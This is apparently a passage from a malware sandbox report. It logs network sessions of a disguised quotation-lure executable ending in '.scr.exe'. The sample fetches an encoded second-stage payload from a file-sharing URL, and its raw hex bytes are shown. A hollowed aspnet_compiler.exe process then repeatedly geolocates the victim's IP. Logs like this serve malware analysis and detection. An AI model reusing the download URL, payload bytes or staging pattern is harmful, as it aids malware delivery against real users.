2024-11-21 12:08:03 UTC	128	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 34 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 37 32 76 77 47 33 6e 59 65 75 41 62 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e Data Ascii: 80<h1>Redirect</h1><p><a href="https://s24.filetransfer.io/storage/download/72vwG3nYeuAb">Please click here to continue</a>.
2024-11-21 12:08:03 UTC	6	IN	Data Raw: 3c 2f 70 3e 0d 0a Data Ascii: </p>
2024-11-21 12:08:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	188.114.96.3	443	2132	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:08:04 UTC	98	OUT	GET /storage/download/72vwG3nYeuAb HTTP/1.1 Host: s24.filetransfer.io Connection: Keep-Alive
2024-11-21 12:08:10 UTC	1247	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:08:09 GMT Content-Type: application/octet-stream Content-Length: 1072640 Connection: close Last-Modified: Thu, 21 Nov 2024 07:42:13 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=d09fa9d1957db051fd2670631a84bfb9; expires=Thu, 05-Dec-2024 12:08:08 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Yyuirabaeaw.dat" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "673ee455-105e00" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOXqVsSVRi7GcRc2qHyGdyrhi23G7OReDe0WQ%2FE3%2BxFgVsPbzK2DIkQLgiIfQAsatvf0OI8pSxZENmRKdxUbmekZlbM2MivcfTpVOO9o25ieADzA8TkGfR4VEu%2FpVbdheTetyppa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6090281e2d8c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=712&delivery_rate=1474747&cwnd=184&unsent_bytes=0&cid=692ab778f91987d2&ts=5212&x=0"
2024-11-21 12:08:10 UTC	122	IN	Data Raw: 7f 63 a0 32 3a 30 32 39 34 32 39 30 cd c6 30 32 81 30 32 39 30 32 39 30 72 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 b2 39 30 32 37 2f 88 37 30 86 30 fd 13 81 31 7e f4 11 66 51 59 41 19 40 40 56 57 40 58 5d 12 5a 51 5c 57 5f 46 19 52 57 19 42 47 57 10 5b 57 10 76 76 63 12 54 5f 56 5c 1e 3f 34 3a 16 39 Data Ascii: c2:0294290020290290r902902902902902902902902902902902909027/7001~fQYA@@VW@X]ZQ\W_FRWBGW[WvvcT_V\?4:9
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 30 32 39 30 32 39 60 77 39 30 7e 38 33 32 b8 52 92 8d 30 32 39 30 32 39 30 32 d9 30 3c 18 3b 33 09 30 32 6f 20 32 39 36 32 39 30 32 39 30 7c 4d 20 32 39 10 32 39 30 b2 29 30 32 39 70 32 39 10 32 39 30 30 39 30 36 39 30 32 39 30 32 39 34 32 39 30 32 39 30 32 39 f0 22 39 30 30 39 30 32 39 30 32 3a 30 72 bc 30 32 29 30 32 29 30 32 39 30 22 39 30 22 39 30 32 39 30 32 36 30 32 39 30 32 39 30 32 39 30 32 39 44 22 39 7b 32 39 30 32 b9 20 32 15 33 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 99 20 32 35 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 12 39 30 3a 39 30 32 39 30 32 39 30 32 39 30 3a 19 30 32 71 30 32 39 30 32 39 30 32 39 30 32 17 Data Ascii: 029029`w90~832R029029020<;302o 296290290\|M 29290)029p2929009069029029429029029"900902902:0r02)02)0290"90"9029026029029029029D"9{2902 232902902902902902902 25029029029029029029029029029029029029029029029029029090:90290290290:02q02902902902
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 32 3a 00 3a 39 34 32 39 30 32 39 30 32 39 30 25 13 71 2e 39 30 32 39 30 32 01 30 32 39 51 31 39 30 ab 3a 30 32 00 30 32 39 27 32 39 31 31 09 38 32 3d 30 32 39 30 32 39 30 32 39 27 18 78 2c 32 39 30 32 39 30 4e 39 30 32 9d 31 32 39 10 30 39 30 0b 39 30 32 2e 30 32 38 23 02 3d 30 36 39 30 32 39 30 32 39 30 32 2e 1a 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 32 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 1c 39 30 32 16 30 32 39 35 32 39 30 0a 10 30 32 39 4e 4d 3b 30 36 11 45 35 39 36 12 38 30 32 39 4e 3f 3b 30 36 42 3a 30 39 34 08 f5 cf cd c6 16 12 38 30 32 39 08 f3 c6 cf cd 13 4e b2 3b 30 36 11 49 35 39 36 12 39 30 32 39 4e 3f 3b 30 Data Ascii: 2::94290290290%q.902902029Q190:02029'291182=029029029'x,290290N902129090902.028#=06902902902.!32=0290290290*1942902902902#:0902802(;0422907020290502\|32909020295290029NM;06E5968029N?;06B:0948029N;06I5969029N?;0
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 2b 30 32 2e 1a 32 39 30 20 39 30 26 13 30 32 39 5a 1a f1 32 32 3f 4e 4d 3b 30 36 11 45 35 39 36 4c b9 32 32 3d 18 4b 3e 30 34 13 30 58 11 f8 30 39 36 4c 46 32 32 3d 18 47 3e 30 34 47 b0 30 39 34 1a 40 37 32 3f 1a 32 53 18 fa 3b 30 34 47 4f 30 39 34 1a 4c 37 32 3f 4e b2 3b 30 36 11 49 35 39 36 18 39 5a 1a f1 32 32 3f 4e 4d 3b 30 36 11 45 35 39 36 4c b9 32 32 3d 18 4b 3e 30 34 13 30 58 11 f8 30 39 36 4c 46 32 32 3d 18 47 3e 30 34 47 b0 30 39 34 1a 40 37 32 3f 1a 32 53 18 fa 3b 30 34 47 4f 30 39 34 1a 4c 37 32 3f 4e b2 3b 30 36 11 49 35 39 36 18 39 5a 1a f1 32 32 3f 4e 4d 3b 30 36 11 45 35 39 36 4c b9 32 32 3d 18 4b 3e 30 34 13 30 58 11 f8 30 39 36 4c 46 32 32 3d 18 47 3e 30 34 47 b0 30 39 34 1a 40 37 32 3f 1a 32 53 18 fa 3b 30 34 47 4f 30 39 34 1a 4c 37 32 Data Ascii: +02.290 90&029Z22?NM;06E596L22=K>040X096LF22=G>04G094@72?2S;04GO094L72?N;06I5969Z22?NM;06E596L22=K>040X096LF22=G>04G094@72?2S;04GO094L72?N;06I5969Z22?NM;06E596L22=K>040X096LF22=G>04G094@72?2S;04GO094L72
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 30 32 01 a7 cd c6 cf 20 39 30 24 13 30 32 39 22 32 39 24 18 39 30 32 2b 30 32 2e 1a 32 39 30 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3d 30 36 39 30 32 39 30 32 39 30 32 2d 1a 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 24 18 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3c 30 36 39 30 32 39 30 32 39 30 32 2d 1a 21 09 33 32 b9 30 32 39 31 32 39 21 1a f1 32 32 3f 10 30 39 30 32 c7 3e 32 39 08 32 39 30 32 c7 3c 32 39 75 31 39 30 32 6e 30 32 39 35 32 39 30 1c 39 30 32 01 62 32 39 30 4c b9 32 32 3d 18 4b 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 56 3b 30 36 03 fc cd c6 cf 14 19 30 32 39 30 0a f8 cf cd c6 4e 4d 3b 30 36 11 45 35 39 36 12 38 30 32 39 4e 3f 3b 30 36 42 39 30 39 34 08 9a cf cd c6 Data Ascii: 02 90$029"29$902+02.290 90%029"29$9021942902902902#=06902902902-!32=029029029$1942902902902#<06902902902-!32029129!22?0902>292902<29u1902n0295290902b290L22=K>040290L422=KV;060290NM;06E5968029N?;06B9094
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 18 47 4f 30 39 34 1a 4c 37 32 3f 10 32 39 30 32 47 3d 30 39 34 49 65 32 32 3d 09 90 c6 cf cd 1f 10 32 39 30 32 01 a7 cd c6 cf 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2b 30 32 2d 1a 32 39 30 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 31 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 1d 39 30 32 3f 30 32 39 35 32 39 30 0a 13 30 32 39 1a 4c 46 32 32 3d 18 47 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 38 3b 30 36 03 fb Data Ascii: GO094L72?2902G=094Ie22=2902 90%029"29$902+02-290!32=0290290290+02-290!32=0290290290+02-290!32=0290290290+02-290!32=0290290290*1942902902902#:0902802(;0412907020290502\|3290902?0295290029LF22=G>040290L422=K8;06
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 19 30 32 39 30 4c 34 32 32 3d 4b 18 3b 30 36 00 fc cd c6 cf 14 19 30 32 39 30 0a f8 cf cd c6 4e 4d 3b 30 36 11 45 35 39 36 12 39 30 32 39 4e 3f 3b 30 36 42 3a 30 39 34 08 9a cf cd c6 16 12 38 30 32 39 08 aa c6 cf cd 13 22 32 39 27 18 39 30 32 2b 30 32 2d 1a 32 39 30 31 09 38 32 3d 30 32 39 30 32 39 30 32 39 30 18 38 20 32 39 30 32 ee 31 9d bf 32 0b 2e 30 32 38 33 02 31 30 36 39 30 32 39 30 32 39 30 32 2d 1a 33 25 30 32 39 30 34 3b 78 7c 3b 09 25 39 30 33 3b 30 bf 39 bb 2a 38 4c 32 39 30 32 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 32 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 1c 39 30 32 3c 30 32 39 1f 32 39 30 0a 10 30 32 39 4e b2 3b 30 36 11 49 35 39 36 12 39 30 32 39 4e 3f Data Ascii: 0290L422=K;060290NM;06E5969029N?;06B:0948029"29'902+02-290182=02902902908 290212.0283106902902902-3%02904;x\|;%903;098L29021942902902902#:0902802(;0422907020290502\|3290902<029290029N;06I5969029N?
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: d4 33 39 30 06 3b 30 32 00 30 32 39 27 32 39 31 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2a 00 31 39 b0 32 39 30 33 39 30 23 11 f8 30 39 36 12 3b 30 32 39 ce 3c 39 30 0a 39 30 32 39 ce 3e 39 30 77 3a 30 32 39 67 32 39 30 1c 39 30 32 3c 30 32 39 08 60 39 30 32 47 4f 30 39 34 1a 4c 37 32 3f 10 33 39 30 32 47 3d 30 39 34 49 72 32 32 3d 09 fe c6 cf cd 1f 10 33 39 30 32 01 f1 cd c6 cf 4c b9 32 32 3d 18 4b 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 4e 3b 30 36 03 93 cd c6 cf 14 19 30 32 39 30 0a a1 cf cd c6 1a 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 3a 00 3a 39 34 32 39 30 32 39 30 32 39 30 25 13 71 2e 39 30 32 39 30 32 b5 30 32 39 38 30 39 30 a6 3b 30 32 03 30 32 39 2b 32 39 31 21 09 33 32 b9 30 32 39 31 32 39 21 1a f1 32 32 3f 10 33 39 30 32 c7 Data Ascii: 390;02029'291!32=0290290290*19290390#096;029<909029>90w:029g290902<029`902GO094L72?3902G=094Ir22=3902L22=K>040290L422=KN;060290 90%029"29$902::94290290290%q.9029020298090;02029+291!32029129!22?3902
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 32 39 30 33 39 30 23 11 f8 30 39 36 12 38 30 32 39 ce 3c 39 30 0a 39 30 32 39 ce 3e 39 30 77 3a 30 32 39 35 32 39 30 1d 39 30 32 17 30 32 39 08 32 39 30 32 47 b0 30 39 34 1a 40 37 32 3f 10 30 39 30 32 47 3d 30 39 34 49 27 32 32 3d 09 fe c6 cf cd 1f 10 33 39 30 32 01 f1 cd c6 cf 18 47 4f 30 39 34 1a 4c 37 32 3f 10 32 39 30 32 47 3d 30 39 34 49 53 32 32 3d 0a 90 c6 cf cd 1f 10 32 39 30 32 01 a7 cd c6 cf 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 2b 30 32 2f 1a 32 39 30 21 09 33 32 b9 30 32 39 31 32 39 21 1a f1 32 32 3f 10 33 39 30 32 c7 3e 32 39 08 32 39 30 32 c7 3c 32 39 75 31 39 30 32 16 30 32 39 36 32 39 30 37 39 30 32 01 1a 32 39 30 18 47 4f 30 39 34 1a 4c 37 32 3f 10 32 39 30 32 47 3d 30 39 34 49 04 32 32 3d 0a f9 c6 cf cd 1f 10 32 39 30 32 01 f0 Data Ascii: 290390#0968029<909029>90w:02952909020292902G094@72?0902G=094I'22=3902GO094L72?2902G=094IS22=2902 90%029"29$902+02/290!32029129!22?3902>292902<29u190202962907902290GO094L72?2902G=094I22=2902
2024-11-21 12:08:10 UTC	1369	IN	Data Raw: 39 30 20 39 30 26 13 30 32 39 33 02 31 30 36 39 30 32 39 30 32 39 30 32 39 1a 73 25 30 32 39 30 32 39 61 32 39 30 4d 3b 30 32 e9 32 32 39 09 32 39 30 25 39 30 33 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 32 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 37 39 30 32 16 30 32 39 36 32 39 30 0a 39 30 32 39 1a 4c 46 32 32 3d 18 47 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 6c 3b 30 36 03 fb cd c6 cf 14 19 31 32 39 30 0a f9 cf cd c6 4e b2 3b 30 36 11 49 35 39 36 12 39 30 32 39 4e 3f 3b 30 36 42 35 30 39 34 08 9b cf cd c6 16 12 39 30 32 39 08 a5 c6 cf cd 1b 30 26 9c 14 32 39 31 18 39 30 32 2b 30 32 2e 1a 32 39 30 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 3a 00 3a 39 34 32 39 30 32 Data Ascii: 90 90&02931069029029029s%029029a290M;02229290%903*1942902902902#:0902802(;0422907020290502\|3290790202962909029LF22=G>040290L422=Kl;061290N;06I5969029N?;06B509490290&291902+02.290 90%029"29$902::942902

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49811	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:00 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 12:09:00 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:00 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154849 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mf2aKseuBU5M%2Bxcx2t1UNcFu6ZxXoc%2BXyOQ%2FT4EnzZZ4ERs%2F780KT5eBuYbFy0A8z9QhZfBQhoaOR6Z0UeXRf5QC%2FStKQcIKtFAvEzQffNbpdCjaNBdIb8K7AsxKcLYZObS9NeTj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091818c6c435c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2207&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1379310&cwnd=248&unsent_bytes=0&cid=309229331e15737b&ts=464&x=0"
2024-11-21 12:09:00 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49822	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:03 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 12:09:03 UTC	854	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:03 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154852 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDEFO5UlXfRv2BykU4Xf8XuOfTLn3gT3J7XQVWwUFV%2BW54nHDCfcFp7pD7AcHAo%2FsJ2COJsd41T%2F4ZrAibs7raCMs0wBvYPlh26cFYb21bSn%2BRZB3Dm2vHkfOmQy%2BauDMPntWIQz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091952ee342fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1817050&cwnd=32&unsent_bytes=0&cid=e5e77e3efc6f31b3&ts=452&x=0"
2024-11-21 12:09:03 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49829	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:06 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 12:09:06 UTC	845	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:06 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154855 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uu4xSz5nJlbsOheU0lZxPVB6lRmSoPm6LaiQ3nu4ezDxURMs0n2UjyffDc8bAWv6PB2SBazWFNx7IVuDHxQIojQwe0iK6dS5MKPjIX1GD6u6Tyibi8x0da4bCXMXDDITWMY0XD5s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091a8296641f9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1803582&cwnd=208&unsent_bytes=0&cid=70c4ed812e31bc2c&ts=460&x=0"
2024-11-21 12:09:06 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49836	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:09 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 12:09:09 UTC	849	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:09 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154858 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0oLkiCE1NTlukDQOMcJJC2SI5xkg3sjBH87rObhDRxD3h8x6zOOpWO6PdVTV3UV8Qhdox%2B0VUMsls%2BcYpCSs9lbBHd0lrglQPzXpgNMvZVPZfHTvkQqDmHJm9DIeXuIiOL4JTNb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091badcdf4396-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1809169&cwnd=252&unsent_bytes=0&cid=81c381ddafc0b951&ts=477&x=0"
2024-11-21 12:09:09 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49846	188.114.97.3	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:09:12 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 12:09:12 UTC	848	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:12 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 154861 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MDivRvhsArI3ryTNI6I3pXD9YFTodgNXgMvEflzJmF2L%2FA7SPc9ah3A%2F93jSZIb7Vdp8aLAGJkwpLn2wwYsJu4Hvm8eX5hV8EnOB9i09JXreZfc9mafhBUijN9Ssq3oWPGLCMgN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6091cd4a76efa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: 